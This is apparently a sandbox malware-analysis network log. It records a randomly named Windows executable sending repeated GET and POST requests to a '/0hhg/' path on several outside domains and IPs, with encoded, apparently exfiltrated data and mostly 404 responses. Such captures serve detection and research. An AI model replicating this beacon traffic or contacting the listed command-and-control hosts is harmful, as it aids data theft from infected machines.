                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Moved</title> </head> <body> <p>This item has moved <a href="http://betta-dom.ru/0hhg/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 194.58.112.173 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:25:12.829895973 CEST | 436 | OUT | GET /0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&nNWXI=ybhXiHipjHJ HTTP/1.1
                                                                                                    Host: www.bettaroom.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
May 2, 2024 08:25:13.080692053 CEST | 880 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:25:12 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 461
                                                                                                    Connection: close
                                                                                                    Location: http://betta-dom.ru/0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&nNWXI=ybhXiHipjHJ
                                                                                                    Expires: Thu, 02 May 2024 06:30:12 GMT
                                                                                                    Cache-Control: max-age=300
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Moved</title> </head> <body> <p>This item has moved <a href="http://betta-dom.ru/0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&amp;nNWXI=ybhXiHipjHJ">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 195.24.68.5 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:25:19.965226889 CEST | 696 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dhleba51.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dhleba51.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.dhleba51.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=WAreQ2+Ux5U4MllgOBGj9SOhdgXP3al2oCg9x2Oz/uq/1HmNeJ0KyoAg0UvlSqdRSgIyaFxnchNUZ2vwh1Un4DjvpeK5jw42OK+cotGcrexhrDGDxAWfGsO1HTNQrf9ZEbuEwPAN9LldbrM3MXSVcQzjF1SVZo9hKNtJO7dUQgyp/wNrqecmuMK3c9D3+rTOvA==
May 2, 2024 08:25:20.175931931 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 May 2024 06:25:20 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 48773
                                                                                                    Connection: close
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49743 | 195.24.68.5 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:25:22.708353996 CEST | 716 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dhleba51.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dhleba51.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.dhleba51.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=WAreQ2+Ux5U4OF1gMgGjtCOgDwXPuKl6oCc9x3bs/46/1iaNfI0KzoAg/0v8WqdOSgVSaH1ncgtUZ3fwhGMk3zjti+K3tQ42OK+cou6yre5hqweDwhWcPMO2XjNQvf9jEbu2wONF9Ohdbpk3Ml6WVQymKVTLRoBpGokCErxUWgLF+2cx7v9x8MuEB6KDzouH0HMOXTNOwNg+TmARjv6P2pk=
May 2, 2024 08:25:22.916147947 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 May 2024 06:25:22 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 48773
                                                                                                    Connection: close
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49744 | 195.24.68.5 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:25:25.448990107 CEST | 10798 | OUT | POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dhleba51.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dhleba51.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.dhleba51.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Timestamp: May 2, 2024 08:25:25.664294958 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 May 2024 06:25:25 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 48773
                                                                                                    Connection: close
                                                                                                    Accept-Ranges: bytes


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 195.24.68.5 | Destination Port: 80 | PID: 916 | Process: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp: May 2, 2024 08:25:28.179936886 CEST | Bytes transferred: 435 | Direction: OUT | Data:
GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= HTTP/1.1
                                                                                                    Host: www.dhleba51.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Timestamp: May 2, 2024 08:25:28.389938116 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 May 2024 06:25:28 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 48773
                                                                                                    Connection: close
                                                                                                    Accept-Ranges: bytes


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 192.250.235.36 | Destination Port: 80 | PID: 916 | Process: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp: May 2, 2024 08:25:34.487993002 CEST | Bytes transferred: 711 | Direction: OUT | Data:
POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dainikmirpur.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.dainikmirpur.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Timestamp: May 2, 2024 08:25:34.982774973 CEST | Bytes transferred: 1289 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1163
                                                                                                    date: Thu, 02 May 2024 06:25:34 GMT
                                                                                                    server: LiteSpeed
                                                                                                    vary: User-Agent


Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 192.250.235.36 | Destination Port: 80 | PID: 916 | Process: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp: May 2, 2024 08:25:38.187688112 CEST | Bytes transferred: 731 | Direction: OUT | Data:
POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dainikmirpur.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.dainikmirpur.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=6yplKdcMqsq4l4+l3YsUlQhsixmsx8teylaEzsVBhDkaXryFuI+NB2Hv1XXTQd6Vrtv2WRxl0fNqJG5Nij+SO+By5bQBqdksJonrK5Lev2AHNH0qx/8mazMJxKZWzrFWbbtrH5xEjMrCdd+UCSgai0/c1GUUUk+bZM48hAa7c6F6MSp0ycw9+ILGbhhtdgUZsjsOHjMlCHkxOBTLYnxHWK8=
May 2, 2024 08:25:38.690109968 CEST | 1289 | IN
HTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1163
                                                                                                    date: Thu, 02 May 2024 06:25:38 GMT
                                                                                                    server: LiteSpeed
                                                                                                    vary: User-Agent
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advis [TRUNCATED]
May 2, 2024 08:25:38.690186977 CEST | 130 | IN
                                                                                                    Data Ascii: hnologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49748 | 192.250.235.36 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:25:41.138566971 CEST | 10813 | OUT
POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dainikmirpur.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.dainikmirpur.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Data Ascii: ABqDW6A8= [TRUNCATED]
May 2, 2024 08:25:41.888797998 CEST | 1289 | OUT
                                                                                                    Data Ascii: NbHEP0xVTtz8nSKB1JL4vw5TLEHJVRft9VUkrZtpjV5vuiMOqtVHIz4JyjHs+bKCn+nKZ5Jvv6BUTWozm53cXJ6L7x3QF9oYBzp/GzRI+rrHd9J5/SBuLcEVV4Uq7VcR33zndWHodKG855nN62nBKAZrh/g3W6Etp0waexviSEcGZjoFbc7er7RlvmgS+JHgqfr+LDjEshCNW+1+DUbFQC0ZJW5Rg7O7577XLpjVpJtca6qU/dw
May 2, 2024 08:25:42.266565084 CEST | 1289 | OUT
POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dainikmirpur.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.dainikmirpur.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Data Ascii: ABqDW6A8= [TRUNCATED]
May 2, 2024 08:25:42.269491911 CEST | 1289 | OUT
                                                                                                    Data Ascii: ho6SqiuZALNUf+HgMzinz+AmOwTE6gOEMwA+Tewder2DAAdfXIpnRUyXxz4hcPComkWYCwRZuk8o0E74Sq4qsTjSBXyPf0gggmAj8z3PlSfn1xXTXQ+YHZ04E0WMRRglL9DDkk1jykmHvoGhRXQMsf7/ZV8e3mIMU2pDxs2rqy1lfMEYqp21O+fnjgFKDNBU3lbzYeDwpf9kAAzaJWNw/FhSFiRFAELyhnl8+1UGv+5OT3a6do+
May 2, 2024 08:25:42.650294065 CEST | 1289 | IN
HTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1163
                                                                                                    date: Thu, 02 May 2024 06:25:42 GMT
                                                                                                    server: LiteSpeed
                                                                                                    vary: User-Agent
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please b
May 2, 2024 08:25:42.650326014 CEST | 186 | IN
                                                                                                    Data Ascii: e advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
May 2, 2024 08:25:42.650485039 CEST | 1289 | OUT
                                                                                                    Data Ascii: eWaCHYBVnJLkb/xCKQa3jp0RlvkJQ5TJc5HXHKB8ibqGvtn7DhvPEqKy/x2SZKeRrCxUHEC6vdpgpaFlpMhnbF0ORfDrm7SK+XlTrGViSyRhT5VFWiEMx79bisTaUmw7TREIAMLrCYHcdyOI+NfgFrYLSGVm6Z4SMutgLLmvbg57pDkkvqpJUNcf/U7dOEzJ+0FUQ960MYVwp7JUFOpowTCkX/UUOaRpYdZkwkK5UzTntYgmMg8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49749 | 192.250.235.36 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:25:44.979652882 CEST | 440 | OUT
GET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
May 2, 2024 08:25:46.029416084 CEST | 440 | OUT
GET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1
                                                                                                    Host: www.dainikmirpur.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
May 2, 2024 08:25:46.501485109 CEST | 1289 | IN
HTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1163
                                                                                                    date: Thu, 02 May 2024 06:25:46 GMT
                                                                                                    server: LiteSpeed
                                                                                                    vary: User-Agent
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advis [TRUNCATED]
May 2, 2024 08:25:46.501523018 CEST | 130 | IN
                                                                                                    Data Ascii: hnologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49750 | 216.40.34.41 | 80 | 916 | C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:25:51.846330881 CEST | 720 | OUT
POST /0hhg/ HTTP/1.1
                                                                                                    Host: www.whirledairlines.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.whirledairlines.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.whirledairlines.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Ascii: ABqDW6A8=DC75w/OGbTHO201veKrUPOVCUc7YEZO2rPkiZVOTgREYP1IYOM7OLjl45ZeQ7+cM2uFTPhXv+EGgjByps+8kDYb8noJaWYCQ2/vRju2iAnn4qrGGyK6MCrszNPXqd6qJjYfRiYPRVwrr8xxK432+yrZ0r0TS62ZU4jFeYIOV3JyjfiKagc8L0p/NNgljF7nzRQ==
May 2, 2024 08:25:52.000607014 CEST | 1277 | IN
HTTP/1.1 404 Not Found
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    x-request-id: 49fe8594-426a-4020-b242-df6d1a61a0d0
                                                                                                    x-runtime: 0.045185
                                                                                                    content-length: 18187
                                                                                                    connection: close
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                                    May 2, 2024 08:25:52.000627041 CEST1277INData Raw: 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20
                                                                                                    Data Ascii: ne; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px solid #D9D9D9; background: #ECECEC;
                                                                                                    May 2, 2024 08:25:52.000663042 CEST1277INData Raw: 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 74 68 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74
                                                                                                    Data Ascii: e thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table t
                                                                                                    May 2, 2024 08:25:52.000727892 CEST1277INData Raw: 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 65 6e 76 5f 64 75 6d 70 27 29 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 68 65 61 64 65 72 3e 0a 20 20 3c 68 31 3e 52
                                                                                                    Data Ascii: return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="container"> <h2>No route matches [POST] &quot;/0hhg&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id=
                                                                                                    May 2, 2024 08:25:52.000799894 CEST1277INData Raw: 67 67 65 72 2e 72 62 3a 31 35 3a 69 6e 20 60 63 61 6c 6c 5f 61 70 70 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66
                                                                                                    Data Ascii: gger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/acti
